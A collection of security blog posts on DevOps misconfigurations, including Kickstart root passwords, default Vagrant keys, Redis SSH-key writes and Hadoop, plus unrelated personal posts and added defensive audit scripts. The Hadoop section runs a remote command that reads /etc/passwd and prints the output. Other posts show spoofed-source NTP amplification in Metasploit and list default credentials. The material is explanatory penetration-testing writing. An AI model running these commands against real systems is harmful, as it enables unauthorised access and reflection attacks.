Channel: Carnal0wnage & Attack Research Blog

DevOoops: Client Provisioning (Kickstart Files)

Notes from the 2015 Devoops talk. Posting it so I can remove it from the slide deck but still refer to it. Also relevant to the common-problems-with-DevOps theme.

Kickstart Files

3 ways to set root password

1. Enter during installation

2. Crypted hash in the kickstart file
“rootpw --iscrypted”

3. Clear text in the kickstart file
“rootpw --plaintext”

Examples



 Kickstart Files Takeaways

Don't leave these files in open shares

Use the crypted password option for files

Have a process to change the password after initialization

Rotate the initial root password regularly
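To make the takeaways checkable, here is an added example (not code from the talk or the post) that audits Kickstart files for which of the three rootpw options they use and rates any crypt hash by its prefix; the two sample fragments and the placeholder hash are constructed.

```python
"""Audit Kickstart files for how the root password is set.

Added example for this post, not code from the original. It classifies the
rootpw directive the post describes: absent (installer prompts), --iscrypted
(hash, rated by its crypt prefix), or --plaintext / no flag (clear text).
"""

# crypt(3) hash prefixes accepted by --iscrypted. Assumption: anything not in
# this table is reported as an unknown format and flagged for review.
HASH_PREFIXES = {
    "$6$": ("ok", "sha512-crypt"),
    "$5$": ("ok", "sha256-crypt"),
    "$1$": ("warn", "md5-crypt (weak, do not use)"),
}


def audit_rootpw(ks_text):
    """Return (severity, message) findings for every rootpw line in ks_text."""
    findings = []
    rootpw_lines = [
        ln.strip() for ln in ks_text.splitlines()
        if ln.strip().startswith("rootpw")
    ]
    if not rootpw_lines:
        # Option 1 in the post: no rootpw in the file, so anaconda prompts.
        return [("info", "rootpw not set in file; installer will prompt")]
    for line in rootpw_lines:
        tokens = line.split()[1:]
        opts = [t for t in tokens if t.startswith("--")]
        args = [t for t in tokens if not t.startswith("--")]
        if "--lock" in opts and not args:
            findings.append(("ok", "root account locked, no password set"))
        elif "--iscrypted" in opts:
            value = args[0] if args else ""
            sev, name = HASH_PREFIXES.get(value[:3], ("warn", "unknown hash format"))
            findings.append((sev, f"crypted root password: {name}"))
        else:
            # --plaintext, or no flag at all: anaconda treats the value as clear text.
            findings.append(("high", "clear-text root password in Kickstart file"))
    return findings


def worst_severity(findings):
    """Collapse findings to the single worst level, for scripting over a share."""
    order = ["info", "ok", "warn", "high"]
    return max((f[0] for f in findings), key=order.index)


# Constructed sample fragments (not taken from the post or any real deployment).
WEAK_KS = """\
lang en_US.UTF-8
keyboard us
rootpw --plaintext Changeme123
"""

HARDENED_KS = """\
lang en_US.UTF-8
keyboard us
# placeholder sha512-crypt value: correct format, not a real hash
rootpw --iscrypted $6$Z8Q9x0hC$placeholder0000000000000000000000000000000000000000000000000000000000000000000000000
"""

if __name__ == "__main__":
    for label, ks in (("weak", WEAK_KS), ("hardened", HARDENED_KS)):
        print(label, worst_severity(audit_rootpw(ks)), audit_rootpw(ks))
```

Point it at every .ks/.cfg on a provisioning share and anything reporting "high" or "warn" is a file to fix before it is served to another install.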






DevOoops: Client Provisioning (Vagrant)

Notes from the 2015 Devoops Talk

Vagrant used to ship with a default keypair and was difficult to rotate.

**Fixed in newer versions of Vagrant, but finding hosts that still use the default key is pretty likely.


Did you change your SSH keys?


Default Credentials

root/vagrant  vagrant/vagrant

No pass to sudo :-)


Scanning for the default key using Metasploit (ssh_login_pubkey module)



Identify real from fake with an SSH version scan



Log in with private key

DevOoops: In-Memory Databases (Redis) Part 2

Doing part 2 first as the altcoin mining stuff is interesting with the MongoDB/Elasticsearch ransomware stuff currently going on.

A Redis developer dropped an interesting piece of info here:

http://antirez.com/news/96

Namely:
“However, the ability to control the server configuration using the CONFIG command makes the client able to change the working directory of the program and the name of the dump file. This allows clients to write RDB Redis files at random paths, that is a security issue that may easily lead to the ability to run untrusted code as the same user as Redis is running”

He goes on to show how someone could echo over SSH keys and use the CONFIG command to write them to the appropriate place if you have permissions. He used a key name of "crackit" so I thought I'd see how prevalent it was....I checked a few and saw it in a good chunk of them.

go go shodan




I did find something interesting while looking thru some open redis boxes.  I found:



A cron job? running a shell script. Can you do that from Redis???

What's in the shell script?!



alt coin mining! sweeeeeet.

I had no idea what an XMR is but I wanted to see how this person was doing with the money making. Thankfully you can just query the payouts for any XMR address. So I did:






They've made around $20,000 USD in BTC. I guess crime does pay :-)




To satisfy my curiosity I started a miner up on a Linode and was getting around 60 H/s. This person is cranking out 70 KH/s, so they have a few boxes working for them.


Extending the idea that a good hack yields plenty more I stumbled across this gem. https://phpinfo.me/2016/07/07/1275.html with several different ways to get code exec on redis.

I created some gists from the previous link in case the post disappears.
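As an added example (not antirez's, the Redis project's, or the post's code), the following checks cover both things above: whether a redis.conf leaves CONFIG reachable from the network, and whether a dir/dbfilename pair or a stored value looks like the SSH-key or cron write the post describes. The path markers, key markers and sample configs are constructed assumptions, not an exhaustive list.

```python
"""Check Redis settings for the CONFIG SET dir/dbfilename write primitive.

Added example for this post, not antirez's or the Redis project's code. It
parses a redis.conf to see whether CONFIG is reachable from the network, and
classifies dir/dbfilename values (as returned by CONFIG GET) that would land
an RDB dump in an SSH or cron location. Path markers are an assumption.
"""
import shlex

# Directories an RDB dump should never be written into (illustrative list).
SENSITIVE_DIR_MARKERS = ("/.ssh", "/cron", "/etc/cron", "/var/spool/cron")
# Dump file names that only make sense as an overwrite target, not a backup.
SENSITIVE_FILE_NAMES = ("authorized_keys", "crontab", "root")


def parse_redis_conf(text):
    """Return {directive: [args, ...]}, keeping every occurrence (rename-command repeats)."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return (severity, message) findings about network reachability of CONFIG."""
    conf = parse_redis_conf(text)
    findings = []
    bind = conf.get("bind", [[]])[-1]
    public = not bind or any(a in ("0.0.0.0", "::", "*") for a in bind)
    auth = conf.get("requirepass", [[""]])[-1]
    has_auth = bool(auth and auth[0])
    protected = (conf.get("protected-mode", [["yes"]])[-1] or ["yes"])[0].lower() == "yes"
    if public and not has_auth:
        findings.append(("high", "listens on all interfaces with no requirepass"))
    if not protected:
        findings.append(("warn", "protected-mode is off"))
    renamed = None
    for args in conf.get("rename-command", []):
        if len(args) == 2 and args[0].upper() == "CONFIG":
            renamed = args[1]
    if renamed is None:
        findings.append(("warn", "CONFIG command is not renamed or disabled"))
    elif renamed == "":
        findings.append(("ok", "CONFIG command disabled via rename-command"))
    else:
        findings.append(("ok", "CONFIG command renamed"))
    return findings


def dump_target_is_suspicious(directory, dbfilename):
    """True if CONFIG GET dir/dbfilename point a dump at SSH keys or cron."""
    d = directory.rstrip("/")
    if any(marker in d for marker in SENSITIVE_DIR_MARKERS):
        return True
    return dbfilename in SENSITIVE_FILE_NAMES


def keys_holding_ssh_keys(kv):
    """Names of keys whose value carries an SSH public key (the post's 'crackit' pattern)."""
    markers = ("ssh-rsa ", "ssh-ed25519 ", "ecdsa-sha2-")
    return sorted(k for k, v in kv.items() if any(m in v for m in markers))


# Constructed sample configurations (not from the post or any real host).
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
requirepass "placeholder-long-random-secret"
rename-command CONFIG ""
dir /var/lib/redis
"""

if __name__ == "__main__":
    print(audit_redis_conf(WEAK_CONF))
    print(audit_redis_conf(HARDENED_CONF))
    print(dump_target_is_suspicious("/root/.ssh", "authorized_keys"))
```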



-CG-


Kano review

Below is a quick review of the Kano computer.

WTF is it?

The Kano computer is a Raspberry Pi based computer that is meant for kids to put together and build themselves. Looks a bit like this:


propaganda video:


It ships with a nice guide that most kids will be able to follow to get the pieces of the Kano computer up and running. Optionally you can also buy a screen kit where everything fits together in a tidy package. The screen kit that houses the Raspberry Pi and keyboard is the reason I went with the Kano over just piecing one together for the kids.




Once you get the hardware set up, the Kano OS walks you thru setting up a user account and starts off in story mode, where you start on SD beach and get to explore your computer in an RPG-type environment.




You also have a menu for kids where they can pick what they want to work on, but it also has a classic button if you want to get to a more normal Linux experience.



Not shown in the screenshot but definitely present in the menu now is a link to Scratch, which the kids love. And of course no computer for kids can ship without Minecraft:




The OS is designed to get the kids to go through various quests to learn about the computer and as you complete quests more open up to you. More info around this is available on the Kano developer blog: http://developers.kano.me/2016/08/03/kano-os-beta-v340-released/

The Kano OS is available here: http://developers.kano.me/downloads/  if you want to throw it in a VM or raspberry pi you have around the house. It is also open source so you can contribute: https://github.com/KanoComputing

The Kano world portal also has fun stuff https://world.kano.me/projects 

As an added bonus Kano has been sending emails for the kids to experiment with stuff. 



This week's "Secrets of the Computer Kit" included an introduction to the Linux terminal and cowsay!

cowsay, with some Scratch on the other Kano

The kids also got their first real Linux experience by the screen flipping and it still being flipped after a reboot. We eventually found an option in the menu to flip it back, but it was a nice introduction to the hell that is running Linux...good times. Enjoy Linux hell boys, I'll be here to help you <3

Overall extremely pleased.  

Two negative experiences though:

One was the first upgrade process. It took over 30 minutes to download all the updates. I ended up losing the kids for the night during that process due to it taking so long.

Second was the fact the computers showed up one day and the monitors the next!? WTF. I realize Kano doesn't have control of all things shipping but it was a real PITA to have computers and no monitors.  Suggestion: bundle kits should ship together.

Aside from the above, the kids have been enjoying their new computers.


I know it's coming so I'll just address it here: 250 bucks for a Raspberry Pi?! Yeah kinda steep...but I did price something comparable out before I bought. Here is what I came up with:

https://www.adafruit.com/products/2718  Pi Foundation Display - 7" Touchscreen Display for Raspberry Pi  $79.95 

https://www.adafruit.com/products/2033 Pimoroni Raspberry Pi 7" Touchscreen Display Case - Noir  $14.95

https://www.adafruit.com/products/2253 Pi Model B+ / Pi 2 / Pi 3 Case Base - Clear  $5.00  LID 3.00

SD CARD 32 GB various $10-$20

https://www.adafruit.com/products/2876 Full Size Wireless Keyboard with Trackpad  $39.95


OR


Speaker:  ?? 10?

Misc cables to hook it al up ?? 20?

Total ~ $180

or 

https://www.adafruit.com/products/3116  Pi-Top - GREY - A Laptop Kit for Raspberry Pi B+ / Pi 2 / Pi 3  $274.95

None of the above with the exception of the Pi-Top fit nicely together; I'd end up having to build it for the kids and I wanted them to build it themselves. Plus the Kano comes in fun colors with stickers so they can make it their own. I'm satisfied with the purchase, but you could technically do it for the price of a Raspberry Pi and SD card if you have the other gear laying around.

In a similar vein is the Piper computer if you are considering things for kids:





InsomniaHack Trip Report


Insomni'Hack Info:
https://insomnihack.ch/



Favorite talks
Bridging the gap between ICS(IoT?) and corporate IT security
Stefan Lüders

I really enjoyed this talk, hearing how an organization defends in a BYOD & academic environment. Defense is difficult when you control the hosts, even more so when you can't instrument the host and have to rely on network controls only.

My favorite slide was their alerting stack:


Not sure when the slides will be released but here is an older version of the talk I found:
https://www.blackhat.com/docs/us-14/materials/us-14-Luders-Why-Control-System-Cyber-Security-Sucks.pdf

How we hacked Distributed Configuration Management Systems
Francis Alexander & Bharadwaj Machiraj

Awesome talk on breaking into 

  • HashiCorp Consul
  • Apache Zookeeper
  • CoreOS etcd
Tool they created:
https://github.com/torque59/Garfield


Modern reconnaissance phase on APT – protection layer
Paul Rascagnères

Fun talk on how APT groups have been implementing some checks to make sure the targets are valid prior to sending down the final stage of the attack.

CERN
@cktricky and I also were able to give the talk at CERN. Background info on CERN: https://en.wikipedia.org/wiki/CERN

Archive of the talk:

Cool Pix:
Dropping Knowledge


Synchrocyclotron


Outside the Antimatter Factory

Thanks Twitter :-)

Raspbian/Kano OS in QEMU

Quick notes


I wanted to be able to boot the Kano OS in a virtual machine so I could play Hack Minecraft with the kids and play along with the Kano OS desktop/games. I was trying to avoid plugging a Raspberry Pi into a monitor and wanted to use it on my local laptop.

Well, not so easy. VirtualBox/VMware don't support ARM. However, QEMU does.

This repo (https://github.com/dhruvvyas90/qemu-rpi-kernel/wiki/Emulating-Jessie-image-with-4.x.xx-kernel) had the recent raspberry pi kernels to use with QEMU.

Following the steps on that page for mounting the image and editing /etc/ld.so.preload and /etc/fstab, I was able to get the image to boot up successfully...slow as hell...but it technically was working.

command to boot with vnc:


$ qemu-system-arm -vnc :1 -kernel qemu-rpi-kernel/kernel-qemu-4.4.34-jessie -cpu arm1176 -m 256 -M versatilepb  -append "root=/dev/sda2 rootfstype=ext4 rw"  -hda Kanux-Beta-v3.9.0-Lovelace-jessie-rc-2017-03-23_04-48.img

OS with vnc:





It was so horribly slow I don't think this is feasible. I am going to try using libvirt to make it better or just see if I can play Hack Minecraft another way. If I get anywhere further with the project I'll post an update.




DevOoops: Hadoop

What is Hadoop?

"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures."
from: http://hadoop.apache.org/

If you've ever heard of MapReduce...you've heard of Hadoop.

NFI what I'm talking about? Here is a 3-minute video on it: https://www.youtube.com/watch?v=8wjvMyc01QY

What are common issues with MapReduce / Hadoop?

Hadoop injection points from Kaluzny zeronights talk:



Hue

Common defaults admin/admin, cloudera/cloudera



Although occasionally you'll find one that will just let you pick your own :-)

If you gain access, you get full HDFS access, can run queries, etc.


HDFS WebUI
HDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).





From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.





Update: The Hadoop attack library is worth checking out.
https://github.com/wavestone-cdt/hadoop-attack-library

Most up-to-date presentation on hadoop attack library: https://www.slideshare.net/phdays/hadoop-76515903

There is a piece around RCE (https://github.com/CERT-W/hadoop-attack-library/tree/master/Tools%20Techniques%20and%20Procedures/Executing%20remote%20commands)

You'll need info found in ip:50070/conf





TL;DR: find the correct open Hadoop ports and run a MapReduce job against the remote Hadoop server.
You need to be able to access the following Hadoop services through the network:
  • YARN ResourceManager: usually on ports 8030, 8031, 8032, 8033 or 8050
  • NameNode metadata service in order to browse the HDFS datalake: usually on port 8020
  • DataNode data transfer service in order to upload/download file: usually on port 50010


Let's see it in action:


lookupfailed-2:hadoop CG$ hadoop jar /usr/local/Cellar/hadoop/2.7.3/libexec/share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar -input /tmp/a.txt -output blah_blah -mapper "/bin/cat /etc/passwd" -reducer NONE

17/01/05 22:11:40 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/hadoop-unjar5960812935334004257/] [] /var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/streamjob4422445860444028358.jar tmpDir=null
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:8032
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at nope.members.linode.com/1.2.3.4:8032
17/01/05 22:11:43 INFO mapred.FileInputFormat: Total input paths to process : 1
17/01/05 22:11:43 INFO mapreduce.JobSubmitter: number of splits:2
17/01/05 22:11:44 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1483672290130_0001
17/01/05 22:11:45 INFO impl.YarnClientImpl: Submitted application application_1483672290130_0001
17/01/05 22:11:45 INFO mapreduce.Job: The url to track the job: http://nope.members.linode.com:8088/proxy/application_1483672290130_0001/
17/01/05 22:11:45 INFO mapreduce.Job: Running job: job_1483672290130_0001
17/01/05 22:12:00 INFO mapreduce.Job: Job job_1483672290130_0001 running in uber mode : false
17/01/05 22:12:00 INFO mapreduce.Job:  map 0% reduce 0%
17/01/05 22:12:10 INFO mapreduce.Job:  map 100% reduce 0%
17/01/05 22:12:11 INFO mapreduce.Job: Job job_1483672290130_0001 completed successfully
17/01/05 22:12:12 INFO mapreduce.Job: Counters: 30
File System Counters
FILE: Number of bytes read=0
FILE: Number of bytes written=240754
FILE: Number of read operations=0
FILE: Number of large read operations=0
FILE: Number of write operations=0
HDFS: Number of bytes read=222
HDFS: Number of bytes written=2982
HDFS: Number of read operations=10
HDFS: Number of large read operations=0
HDFS: Number of write operations=4
Job Counters 
Launched map tasks=2
Data-local map tasks=2
Total time spent by all maps in occupied slots (ms)=21171
Total time spent by all reduces in occupied slots (ms)=0
Total time spent by all map tasks (ms)=21171
Total vcore-milliseconds taken by all map tasks=21171
Total megabyte-milliseconds taken by all map tasks=21679104
Map-Reduce Framework
Map input records=1
Map output records=56
Input split bytes=204
Spilled Records=0
Failed Shuffles=0
Merged Map outputs=0
GC time elapsed (ms)=279
CPU time spent (ms)=1290
Physical memory (bytes) snapshot=209928192
Virtual memory (bytes) snapshot=3763986432
Total committed heap usage (bytes)=65142784
File Input Format Counters 
Bytes Read=18
File Output Format Counters 
Bytes Written=2982
17/01/05 22:12:12 INFO streaming.StreamJob: Output directory: blah_blah

lookupfailed-2:hadoop CG$ hadoop fs -ls blah_blah
17/01/05 22:12:22 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 3 items
-rw-r--r--   3 root supergroup          0 2017-01-05 22:12 blah_blah/_SUCCESS
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00000
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00001

lookupfailed-2:hadoop CG$ hadoop fs -cat blah_blah/part-00001
17/01/05 22:12:49 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin
hduser:x:1000:1000:,,,:/home/hduser:/bin/bash



http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

Walks you thru how to get reverse shells or meterpreter shells (windows) if you can run commands.
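The same ip:50070/conf page that hands an outsider the endpoints for the streaming job above also tells you whether job submission is authenticated at all. Here is an added example (not from the hadoop-attack-library or any Hadoop project) that parses that XML, pulls out the service addresses the post lists, and flags the settings that let an anonymous client run a job; the property names are standard Hadoop keys, and the sample XML is constructed.

```python
"""Audit the XML that a NameNode serves at http://namenode:50070/conf.

Added example for this post, not code from the hadoop-attack-library or any
Hadoop project. Property names are standard Hadoop configuration keys; the
sample document below is constructed, not captured from a real cluster.
"""
import xml.etree.ElementTree as ET
from urllib.request import urlopen


def parse_hadoop_conf(xml_text):
    """Return {name: value} from a Hadoop <configuration> document (str or bytes)."""
    data = xml_text.encode("utf-8") if isinstance(xml_text, str) else xml_text
    root = ET.fromstring(data)
    props = {}
    for prop in root.iter("property"):
        name = prop.findtext("name")
        if name:
            props[name] = (prop.findtext("value") or "").strip()
    return props


def cluster_endpoints(props):
    """Pick out the service addresses a client would use (the ports the post lists)."""
    keys = (
        "fs.defaultFS",                  # NameNode RPC, usually 8020
        "yarn.resourcemanager.address",  # job submission, usually 8030-8033 or 8050
        "dfs.datanode.address",          # data transfer, usually 50010
    )
    return {k: props[k] for k in keys if k in props}


def audit_hadoop_conf(props):
    """Return (severity, message) findings for the settings that gate remote jobs."""
    findings = []
    auth = props.get("hadoop.security.authentication", "simple").lower()
    if auth != "kerberos":
        findings.append(("high", "hadoop.security.authentication=%s: any client "
                                 "can submit jobs as any user" % auth))
    if props.get("hadoop.security.authorization", "false").lower() != "true":
        findings.append(("warn", "hadoop.security.authorization is off (no service ACLs)"))
    if props.get("dfs.permissions.enabled", "true").lower() != "true":
        findings.append(("warn", "dfs.permissions.enabled=false: HDFS ignores file permissions"))
    if props.get("dfs.webhdfs.enabled", "false").lower() == "true" and auth != "kerberos":
        findings.append(("warn", "WebHDFS enabled without Kerberos"))
    return findings or [("ok", "authentication and authorization look enabled")]


def audit_namenode(url):
    """Fetch /conf from a NameNode you administer and audit it (network; not run in tests)."""
    with urlopen(url, timeout=10) as resp:
        return audit_hadoop_conf(parse_hadoop_conf(resp.read()))


# Constructed /conf excerpt mirroring a default (unauthenticated) install.
SAMPLE_CONF_XML = """<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<configuration>
<property><name>fs.defaultFS</name><value>hdfs://namenode.example:8020</value><source>core-site.xml</source></property>
<property><name>yarn.resourcemanager.address</name><value>namenode.example:8032</value><source>yarn-site.xml</source></property>
<property><name>dfs.datanode.address</name><value>0.0.0.0:50010</value><source>hdfs-default.xml</source></property>
<property><name>hadoop.security.authentication</name><value>simple</value><source>core-default.xml</source></property>
<property><name>hadoop.security.authorization</name><value>false</value><source>core-default.xml</source></property>
<property><name>dfs.permissions.enabled</name><value>true</value><source>hdfs-default.xml</source></property>
</configuration>
"""

if __name__ == "__main__":
    props = parse_hadoop_conf(SAMPLE_CONF_XML)
    print(cluster_endpoints(props))
    for sev, msg in audit_hadoop_conf(props):
        print(sev, msg)
```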




Resources:
http://2015.zeronights.org/assets/files/03-Kaluzny.pdf

video of above talk from appsecEU 2015 https://www.youtube.com/watch?v=ClXKGI8AzTk
http://hackedexistence.com/downloads/Cloud_Security_in_Map_Reduce.pdf

https://media.blackhat.com/bh-us-10/presentations/Becherer/BlackHat-USA-2010-Becherer-Andrew-Hadoop-Security-slides.pdf 

https://securosis.com/assets/library/reports/Securing_Hadoop_Final_V2.pdf

https://github.com/CERT-W/hadoop-attack-library

https://www.sans.org/score/checklists/cloudera-security-hardening

http://archive.hack.lu/2016/Wavestone%20-%20Hack.lu%202016%20-%20Hadoop%20safari%20-%20Hunting%20for%20vulnerabilities%20-%20v1.0.pdf

http://www.cloudera.com/documentation/enterprise/latest/topics/cdh_ig_ports_cdh5.html


What did I miss?  Anything to add?

Mentoring: On meeting your **Heroes**


I put heroes in asterisks because none of us have paparazzi following us around. I regularly use Val Smith's quote that even the most popular infosec person is like a famous bowler. Except for rare exceptions, no one outside of our community knows who we are. I've broken into at least one company from every vertical and my neighbor just asks me to help configure his wifi.




This topic came up because the person I'm mentoring met "a famous infosec person" and the guy proceeded to be a drunk dbag to him. It ended up taking quite a bit of wind out of his sails to have someone he kinda looked up to bag on his current career state and talks he was working on.

When I first joined the Army I thought anyone with a "tower of power" (Expert Infantry Badge, Airborne, Air Assault) was an awesome, do-no-wrong individual. Shit, if someone has all this shit on their chest they must be badass right??!!
For more info on badges: https://en.wikipedia.org/wiki/Badges_of_the_United_States_Army

Well the Army does a great job of stacking the people you initially meet as being pretty decent individuals. I think most people think highly of their drill sergeants their entire life.  So the first few people I met that had these badges reaffirmed this belief.  Then I got out and met a few more and was completely let down at the quality of these people.  When I say let down, I mean defeated/totally bothered that these people didn't live up to the pedestal I had put them on. It REALLY bothered me.

What you learn is that in the military you get to wear a badge you earned at any point in your career for your entire career. So maybe at some point someone was awesome enough to earn a badge. This doesn't mean they are a great leader, still good at what the badge means they are good at, or even a good person. It means at one point in time they met a criteria and earned a badge.

How does this relate to Infosec?

We are all humans and generally react poorly to any sort of fame.

A good chunk of us are introverts.

The "community" values exploits and clever hacks over being a good person or helping others.

We have people that 10 years later are still riding the vapor trails of some awesome shit they did but haven't done anything else relevant since. Some people have giant egos and only care about you if you are currently in the process of kissing their ass. To be fair, if people ARE kissing your ass it's hard not to get an ego, but you have to work hard to check that shit at the door.

Remember we are famous bowlers?


What can you do?

Check your ego.

Stay Humble.

Help (mentor) others.

Always remember how you felt when that hero dissed you when you are someone else's hero.


-CG






NTP/SNMP amplification attacks

I needed to verify an SNMP and NTP amplification vulnerability was actually working.

Metasploit  has a few scanners for ntp vulns in the auxiliary/scanner/ntp/ntp_* and it will report hosts as being vulnerable to amplification attacks.

msf auxiliary(ntp_readvar) > run

[*] Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)

[+] 1.1.1.1:123 - Vulnerable to NTP Mode 6 READVAR DRDoS: No packet amplification and a 34x, 396-byte bandwidth amplification


I've largely not paid attention to these types of attacks in the past but in this case needed to validate I could get the vulnerable host to send traffic to a target/spoofed IP.

I set up 2 boxes to run the attack; an attack box and a target box that I used as the spoofed source IP address. I ran tcpdump on the target/spoofed server (yes...listening for UDP packets) and it was receiving no UDP packets when I ran the attack. If I didn't spoof the source IP, the vulnerable server would send data back to the attacker IP, but not the spoofed IP.

Metasploit (running as root) can spoof the IP for you:

msf auxiliary(ntp_readvar) > set SRCIP 2.2.2.2
SRCIP => 2.2.2.2
msf auxiliary(ntp_readvar) > run

[*] Sending NTP v2 READVAR probes to 1.1.1.1->1.1.1.1 (1 hosts)

[*] Sending 1 packet(s) to 1.1.1.1 from 2.2.2.2

To rule out it being a Metasploit thing I also worked thru the attack with scapy following the examples here:
http://www.nothink.org/misc/snmp_reflected.php

So I asked on Twitter...fucking mistake...after getting past the trolls and well-intentioned people that didn't think I understood basic networking/spoofing at all (heart u), I got link #1 and link #2 as the likely reason I couldn't spoof the IP, as well as a hint that the last time someone got it to work they had to rent a physical server in a dodgy colo.

A bit of reading later I found https://spoofer.caida.org/recent_tests.php, which allows you to check whether a particular ASN supports spoofing, along with the stat that only 20% of the Internet allows spoofing.




source: https://spoofer.caida.org/summary.php

Checking common ISP and cloud provider ASNs showed that most weren't vulnerable to spoofing.

So mystery solved and another aux module/vuln scanner result that can be quickly triaged and/or ignored.

If someone has had different results please let me know.


P.S.
Someone asked if the vuln host was receiving the traffic. I couldn't answer for the initial host but to satisfy my curiosity on the issue  I built a vulnerable NTP server and it did NOT receive the traffic even with hosts from the same VPS provider in the same data center (different subnets).
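Whether or not the spoofed traffic ever reaches the victim, the module's READVAR finding means the ntpd answers mode 6 control queries from anyone. As an added example (not Metasploit's or the NTP project's code), this checks an ntp.conf for the restrict settings that close that off, so the finding can be triaged from the server side as well; both sample configs are constructed.

```python
"""Check an ntp.conf for the restrictions that stop mode 6/7 query amplification.

Added example for this post, not Metasploit's or any ntp project code. The
ntp_readvar module flags a host that answers mode 6 READVAR control queries
from anyone; on the server side that is an ntpd with no 'noquery' (or
'ignore') in its default restrict line, or no restrict default line at all.
"""


def restrict_lines(text):
    """Return the argument lists of every active 'restrict' directive."""
    out = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop trailing comments
        if line.startswith("restrict"):
            out.append(line.split()[1:])
    return out


def audit_ntp_conf(text):
    """Return (severity, message) findings about remote control-query exposure."""
    findings = []
    # 'restrict default ...' or the address-family forms 'restrict -4/-6 default ...'
    defaults = [args for args in restrict_lines(text) if "default" in args[:2]]
    if not defaults:
        findings.append(("high", "no 'restrict default' line: ntpd answers mode 6/7 "
                                 "queries from any address"))
        return findings
    for args in defaults:
        family = args[0] if args[0] in ("-4", "-6") else "both"
        flags = set(args[args.index("default") + 1:])
        if "ignore" in flags or "noquery" in flags:
            findings.append(("ok", f"control queries refused by default ({family})"))
        else:
            findings.append(("warn", f"restrict default lacks noquery ({family}): "
                                     "readvar amplification possible"))
        if "nomodify" not in flags and "ignore" not in flags:
            findings.append(("warn", f"restrict default lacks nomodify ({family}): "
                                     "remote runtime reconfiguration allowed"))
    return findings


# Constructed sample configurations (not from the post or any real host).
WEAK_NTP_CONF = """\
driftfile /var/lib/ntp/ntp.drift
server 0.pool.ntp.org iburst
# nomodify stops remote reconfiguration, but queries are still answered
restrict default kod nomodify notrap nopeer
restrict 127.0.0.1
"""

HARDENED_NTP_CONF = """\
driftfile /var/lib/ntp/ntp.drift
server 0.pool.ntp.org iburst
restrict -4 default kod nomodify notrap nopeer noquery
restrict -6 default kod nomodify notrap nopeer noquery
restrict 127.0.0.1
restrict ::1
"""

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_NTP_CONF), ("hardened", HARDENED_NTP_CONF)):
        for sev, msg in audit_ntp_conf(conf):
            print(label, sev, msg)
```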







Vulnerability Disclosure, Free Bug Reports & Being a Greedy Bastard

Backstory:

Most of my life I've been frustrated/intrigued that my Dad was constantly upset that he would "do the right thing" by people and in return people wouldn't show him gratitude... up to straight up fucking him over in return. Over and over the same cycle would repeat of him doing right by someone only to have that person not reciprocate.

The above is important as it relates to the rest of the post and topic(s).

